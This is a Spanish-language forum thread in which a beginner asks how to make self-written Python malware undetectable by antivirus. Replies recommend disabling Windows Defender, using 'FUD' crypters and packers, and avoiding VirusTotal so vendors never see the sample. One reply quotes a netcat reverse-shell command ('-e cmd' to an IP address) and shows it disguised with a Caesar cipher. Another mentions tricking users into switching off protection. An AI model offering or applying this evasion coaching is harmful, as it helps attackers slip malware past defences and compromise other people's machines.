|
Título: Evitar antivirus Publicado por: retr02332 en 28 Noviembre 2019, 01:28 am Soy nuevo en esto de la seguridad, estoy aprendiendo a crear malware con python, con fines educativos claro.
La cosa es que noto que al generar el exe, y descargarlo en una maquina virtual, este no se completa ya que los antivirus estan ahi complicando las cosas. Mi pregunta es: Como puedo hacer para que en lo posible, los antivirus no detecten mi malware? Tambien me aparece eso de descargas de terceros, creo que es porque no estoy verificado o no tengo licencias, como puedo arreglar esto. Espero resupesta a las dos preguntas, muchas gracias. Título: Re: Evitar antivirus Publicado por: Tirenex en 28 Enero 2020, 13:23 pm Hola amigo, a mi también me surgió esa duda y lo que hice es ir al buscador de programas y archivos, escribir Firewall, y a la izquierda, aparece una opción que dice activar o desactivar firewall de windows, click ahí y pulsas donde desactivar firewall de windows (no recomendado). tú prueba eso y me comentas si dió resultado
Título: Re: Evitar antivirus Publicado por: fairlight666 en 29 Enero 2020, 11:57 am Hola amigo, a mi también me surgió esa duda y lo que hice es ir al buscador de programas y archivos, escribir Firewall, y a la izquierda, aparece una opción que dice activar o desactivar firewall de windows, click ahí y pulsas donde desactivar firewall de windows (no recomendado). tú prueba eso y me comentas si dió resultado En todo caso sería realizar un proceso parecido pero buscando al AV, por ejemplo, el Windows Defender (al menos en W10) y desactivarlo, porque es lo que más rompe las bolas al momento de trastear con cochinadas informáticas. Lo ideal para evitar que los AV's se alarmen con los bichitos es blindarlos con un crypter (https://www.indetectables.net/viewtopic.php?t=51265) FUD (FUD significa "totalmente indetectable"). Para que el bichito quede "invisible" a los ojos de los AV's, deberías comprar un crypter o crear el tuyo y cifrar el bicho. Los crypters que encuentres por Internet podrían estar más quemados que el carbón y no servirían de nada. PD: Hace tiempo que no entraba al forillo... Título: Re: Evitar antivirus Publicado por: @XSStringManolo en 9 Febrero 2020, 11:01 am Chequea el Antivirus Hacker's Handbook es una muy buena intro al tema.
Hay otro que se llama disasembling malware o algo así que igual te interesa también. Título: Re: Evitar antivirus Publicado por: chatiel en 28 Febrero 2020, 06:56 am Los antivirus justamente están para leer los códigos y ver que no estés queriendo hacer nada raro.
Cuando ve que utilizas una API que necesita privilegios o que no es normal salta la alarma. Muchos lo que haces es proteger y cifrar un poco el código y para eso existe los PACKERS. Podrías ir probando tu Exe normal en virustotal.com y ver cuantos te toman como virus y después podes Ofuscarlo con un PACKER para ver los resultados. Título: Re: Evitar antivirus Publicado por: XKC en 27 Marzo 2020, 00:23 am Los antivirus justamente están para leer los códigos y ver que no estés queriendo hacer nada raro. Cuando ve que utilizas una API que necesita privilegios o que no es normal salta la alarma. Muchos lo que haces es proteger y cifrar un poco el código y para eso existe los PACKERS. Podrías ir probando tu Exe normal en virustotal.com y ver cuantos te toman como virus y después podes Ofuscarlo con un PACKER para ver los resultados. Nunca jama usar virus total, compartían tu malware con las marcas de entivirus y a amepzar de nuevo Título: Re: Evitar antivirus Publicado por: @XSStringManolo en 30 Marzo 2020, 01:36 am Los av son para detectar malware popular. Muchos av hacen hashes, con que no hagas copia y pega en la mayoría no te detectan nada. A veces te detecta más por el propio packer que por el malware en sí.
Título: Re: Evitar antivirus Publicado por: lBoreal en 6 Abril 2020, 05:06 am Los av son para detectar malware popular. Muchos av hacen hashes, con que no hagas copia y pega en la mayoría no te detectan nada. A veces te detecta más por el propio packer que por el malware en sí. Real, lo verifiqué el otro día. Hice una app de consola que tenía dos lineas (creaban un regisstro de windows) La corrí en virus total y no la detectaba nadie, le pasé el packer y chau.. los packers, crypters públicos no sirven para nada, habrá que ponerse a programar uno que haga cosas diferentes.. de todas maneras las llamadas a las diferentes API parece que no se pueden esconder, Windows Defender me está haciendo la vida imposible. Estoy intentando encontrarle la vuelta.. claramente con ingeniería social eso está resuelto, la gente con tal de usar un programa te desactiva todo.. pero no es la idea Título: Re: Evitar antivirus Publicado por: @XSStringManolo en 6 Abril 2020, 06:17 am Real, lo verifiqué el otro día. Hice una app de consola que tenía dos lineas (creaban un regisstro de windows) Ve modificando el código para saber que es exactamente lo que salta y modifica esos trozos para hacer lo mismo de otra forma. O tira de debugger. A veces con una simple ofuscación basta. Muchos av son prácticamente solo análisis stático. Te miran el binario y si encuentran strings como "netcat 123.123.12 -e cmd" ya te saltan. Le pasas un cesar y listo. "ofudbu 123.123.12 -f dne". Es probable que incluso encuentren similitudes con hashes de otros malware creados por otros de forma similar y que tienen en la base de datos. La corrí en virus total y no la detectaba nadie, le pasé el packer y chau.. los packers, crypters públicos no sirven para nada, habrá que ponerse a programar uno que haga cosas diferentes.. de todas maneras las llamadas a las diferentes API parece que no se pueden esconder, Windows Defender me está haciendo la vida imposible. Estoy intentando encontrarle la vuelta.. claramente con ingeniería social eso está resuelto, la gente con tal de usar un programa te desactiva todo.. pero no es la idea Título: Re: Evitar antivirus Publicado por: lBoreal en 6 Abril 2020, 07:59 am Ve modificando el código para saber que es exactamente lo que salta y modifica esos trozos para hacer lo mismo de otra forma. O tira de debugger. A veces con una simple ofuscación basta. Muchos av son prácticamente solo análisis stático. Te miran el binario y si encuentran strings como "netcat 123.123.12 -e cmd" ya te saltan. Le pasas un cesar y listo. "ofudbu 123.123.12 -f dne". Es probable que incluso encuentren similitudes con hashes de otros malware creados por otros de forma similar y que tienen en la base de datos. Mañana me armo la máquina virtual tal como me recomendaste, es como decís, es cuestión de jugar un poco. Gracias Manolo Título: Re: Evitar antivirus Publicado por: engel lex en 6 Abril 2020, 08:10 am Real, lo verifiqué el otro día. Hice una app de consola que tenía dos lineas (creaban un regisstro de windows) eso no es un virus, ese es el comportamiento de un programa normal, en el mundo empresarial muchas veces mueves .bat con modificaciones del registro porque tienes por ejemplo que actualizar la licencia de un programa en 100 maquinas en un dia... ahora otra cosa es si tu programa modificaba registros de windows en una zona "de cuidado" sin hacer saltar el UAC? el AV no solo lee huellas, la hueuristica es comportamiento, cuando los comportamientos empiezan a salirse de lugar, es que va a saltar el AV, usualmente si pasas por el UAC dandole a "si", el programa puede hacer muchas cosas sin saltar el AV porque tu estas dando permiso formal, si logras por ejemplo modificar archivos en la carpeta windows con algun metodo que no haga saltar el UAC es donde el AV si va a saltar porque el comportamiento no es apropiado Título: Re: Evitar antivirus Publicado por: lBoreal en 6 Abril 2020, 08:19 am Información de valor, muchas gracias. Mañana me creo el entorno y comienzo a peobar
|